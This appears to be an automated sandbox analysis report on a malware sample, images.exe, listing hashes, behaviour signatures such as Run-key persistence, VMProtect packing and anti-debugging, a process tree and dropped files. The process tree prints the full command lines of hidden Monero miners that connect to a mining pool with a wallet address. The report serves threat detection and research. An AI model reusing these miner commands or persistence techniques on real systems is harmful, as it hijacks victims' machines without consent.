Analysis

  • max time kernel
    149s
  • max time network
    138s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    20-11-2024 10:14

General

  • Target

    images.exe

  • Size

    4.5MB

  • MD5

    32f21ab8cf9b96e8ba86395a0edc2e4f

  • SHA1

    2a5b3c07e32b3b2b0c1ef33a10685027703440ec

  • SHA256

    20389c7d417ec512e18bb246a693ce37e041390b6cf1cdd5dca0728b709f910d

  • SHA512

    d7fc84e52ad671f55f07bd46a06ea3b881606f21c457e21d50bc45e08339926d13890792503d3bca46edc866f7a739cf7b845f0182ed18bcdb70bca1db011f6c

  • SSDEEP

    98304:DMUaI9OMzejqikpYbAI7XLyhq6IvorAJKn6kD801cgl0+BhV1C8q0DBAvD:I8Oxy61y6g38ScglnBh20FMD

Malware Config

Signatures

  • Drops startup file 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 11 IoCs
  • VMProtect packed file 7 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • NSIS installer 4 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\images.exe
    "C:\Users\Admin\AppData\Local\Temp\images.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2100
    • C:\Users\Admin\AppData\Roaming\Images\image.exe
      "C:\Users\Admin\AppData\Roaming\Images\image.exe" SW_HIDE
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Loads dropped DLL
      • Adds Run key to start application
      • Enumerates connected drives
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:2848
      • C:\Users\Admin\AppData\Roaming\Images\NsCpuCNMiner64.exe
        "C:\Users\Admin\AppData\Roaming\Images\NsCpuCNMiner64.exe" -dbg -1 -o stratum+tcp://mine.moneropool.com:3333 -u 43f2365syasJKRGGL9H5fdiS2NfEnvn6Yd2vB8HxcqbMhXWgrmQK48EbsnHUL5rknSUGiGET9DkNS1n81MmUWYTQUuHdhbV -p x
        3⤵
        • Executes dropped EXE
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of AdjustPrivilegeToken
        PID:2820
      • C:\Users\Admin\AppData\Roaming\Images\NsGpuCNMiner.exe
        "C:\Users\Admin\AppData\Roaming\Images\NsGpuCNMiner.exe" -dbg -1 -o stratum+tcp://mine.moneropool.com:3333 -u 43f2365syasJKRGGL9H5fdiS2NfEnvn6Yd2vB8HxcqbMhXWgrmQK48EbsnHUL5rknSUGiGET9DkNS1n81MmUWYTQUuHdhbV -p x
        3⤵
        • Executes dropped EXE
        PID:2112
      • C:\Users\Admin\AppData\Roaming\Images\load.exe
        "C:\Users\Admin\AppData\Roaming\Images\load.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:1948

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

    Filesize

    717B

    MD5

    822467b728b7a66b081c91795373789a

    SHA1

    d8f2f02e1eef62485a9feffd59ce837511749865

    SHA256

    af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

    SHA512

    bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7067C2300B3C5B8750D4DEF7C03F30B0

    Filesize

    345B

    MD5

    1a2fcc2b961beda04d8f8d4135759a4c

    SHA1

    25dc5eee0333533aa0476fbe9d35ecc77f48a460

    SHA256

    ac6b6025fd3a31beb1cb8f4b9bcad7b941312b12ac8a74aa1219fff35f865171

    SHA512

    426970f0f185ddd71c7767b19a56a46007ee76db9ecb2546f3ff1da46f19828327dc294fb81ba350fcf1df7c64778acbbb521fa9ebf12bd597d74df90bfd4b06

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

    Filesize

    192B

    MD5

    c1a8b28c217162124acb924b0e517f05

    SHA1

    28e9ff0f110f87e4d37133aa19af8d0a2f9f31c1

    SHA256

    6739a673d693087a579be3437fe7bd7c6e79964efc7f0ec1202bcc5ce44325dd

    SHA512

    ff57eae71b5fceb791a0c9239f90b9af96326eda99cc4c4ab64579938d5ba319c3ae3333da3e3607ccca5b21ffc256cf47f71964671d6d666bb8c5526b6d2fc2

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7067C2300B3C5B8750D4DEF7C03F30B0

    Filesize

    544B

    MD5

    6a28311dcfac7e8c3627edf07f23fa47

    SHA1

    a8582aa0e4e71e6fd319b3f953df07e23acd5061

    SHA256

    ac7b9d9960b459ce142c25c8dcdb9685b9a07e56d7cb86603b1df94ff8a77cb5

    SHA512

    07c3f26d38e603cf4abd4a897e94dd82833aef7eaf78b02ffadb487cd742c3adbd86fffb9e87be63ad66a5cd8d0919d0b8c427bbb74d70c71da931c400b7c1be

  • C:\Users\Admin\AppData\Local\Temp\Cab965.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\TarB33C.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Roaming\Images\pools.txt

    Filesize

    160B

    MD5

    7dc8fd6041f1fd72d9ca2140d0973e5f

    SHA1

    f51572e60f541044672256c1f2aab74736d78c33

    SHA256

    b209b7af96ab8da92860bda8856a4b5632e142011489de12cac9487fc22c652d

    SHA512

    9abc1a281287665378544d1766ac86a1cb217ba0daf1ed27e05d58bfd4e048237292e531b13e9c1bf3349dfcd9bada23dadd482a4ae267a58a97809f8c03774a

  • \Users\Admin\AppData\Local\Temp\nsjE090.tmp\inetc.dll

    Filesize

    21KB

    MD5

    d7a3fa6a6c738b4a3c40d5602af20b08

    SHA1

    34fc75d97f640609cb6cadb001da2cb2c0b3538a

    SHA256

    67eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e

    SHA512

    75cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934

  • \Users\Admin\AppData\Local\Temp\nsz4E2.tmp\System.dll

    Filesize

    11KB

    MD5

    c17103ae9072a06da581dec998343fc1

    SHA1

    b72148c6bdfaada8b8c3f950e610ee7cf1da1f8d

    SHA256

    dc58d8ad81cacb0c1ed72e33bff8f23ea40b5252b5bb55d393a0903e6819ae2f

    SHA512

    d32a71aaef18e993f28096d536e41c4d016850721b31171513ce28bbd805a54fd290b7c3e9d935f72e676a1acfb4f0dcc89d95040a0dd29f2b6975855c18986f

  • \Users\Admin\AppData\Roaming\Images\NsCpuCNMiner64.exe

    Filesize

    1.5MB

    MD5

    eedb9d86ae8abc65fa7ac7c6323d4e8f

    SHA1

    ce1fbf382e89146ea5a22ae551b68198c45f40e4

    SHA256

    d0326f0ddce4c00f93682e3a6f55a3125f6387e959e9ed6c5e5584e78e737078

    SHA512

    9de3390197a02965feed6acdc77a292c0ef160e466fbfc9500fa7de17b0225a935127da71029cb8006bc7a5f4b5457319362b7a7caf4c0bf92174d139ed52ab5

  • \Users\Admin\AppData\Roaming\Images\NsGpuCNMiner.exe

    Filesize

    1.5MB

    MD5

    35d2c42b6ee0acbce9dfe8cc418fe5d8

    SHA1

    66b965d1ee4013c80f7e0e27725e43f3d316325a

    SHA256

    7a2a860bb344526e8546acd172522b4d276a4647f43dd4720281d40e390b283e

    SHA512

    00d89a686995d7b2415f6de5786a175232606cb962744149129ed329fcbf0d4ee076e9bc1125adcaa58571ade5f22372b0bef2d2af78dd12378654e6e23b5ebf

  • \Users\Admin\AppData\Roaming\Images\image.exe

    Filesize

    4.5MB

    MD5

    32f21ab8cf9b96e8ba86395a0edc2e4f

    SHA1

    2a5b3c07e32b3b2b0c1ef33a10685027703440ec

    SHA256

    20389c7d417ec512e18bb246a693ce37e041390b6cf1cdd5dca0728b709f910d

    SHA512

    d7fc84e52ad671f55f07bd46a06ea3b881606f21c457e21d50bc45e08339926d13890792503d3bca46edc866f7a739cf7b845f0182ed18bcdb70bca1db011f6c

  • \Users\Admin\AppData\Roaming\Images\load.exe

    Filesize

    44KB

    MD5

    bc6db57b6f9118ecb27625cb7646688a

    SHA1

    0f864d398c98f3bde6304145b3f65fa65e62d320

    SHA256

    115d327daa7b69fac688a274f18629d3a0dbc92726413af45ab71e51bd03df28

    SHA512

    815d2195c8e8e0e4a9d922f9c6e17259be78ceda370968c2aa1a8fbc82717cdc7d255dbfa9f95e8dab931c18f03d08eef3fb0e3231a8f01cb0bfda64eb53d754

  • memory/2112-86-0x000000013FF30000-0x00000001402EC000-memory.dmp

    Filesize

    3.7MB

  • memory/2820-89-0x000000013F0A0000-0x000000013F44D000-memory.dmp

    Filesize

    3.7MB

  • memory/2820-75-0x000000013F0A0000-0x000000013F44D000-memory.dmp

    Filesize

    3.7MB

  • memory/2820-108-0x000000013F0A0000-0x000000013F44D000-memory.dmp

    Filesize

    3.7MB

  • memory/2848-64-0x0000000003460000-0x000000000380D000-memory.dmp

    Filesize

    3.7MB

  • memory/2848-84-0x0000000003460000-0x000000000381C000-memory.dmp

    Filesize

    3.7MB

  • memory/2848-107-0x0000000003460000-0x000000000380D000-memory.dmp

    Filesize

    3.7MB

  • memory/2848-114-0x0000000003460000-0x000000000381C000-memory.dmp

    Filesize

    3.7MB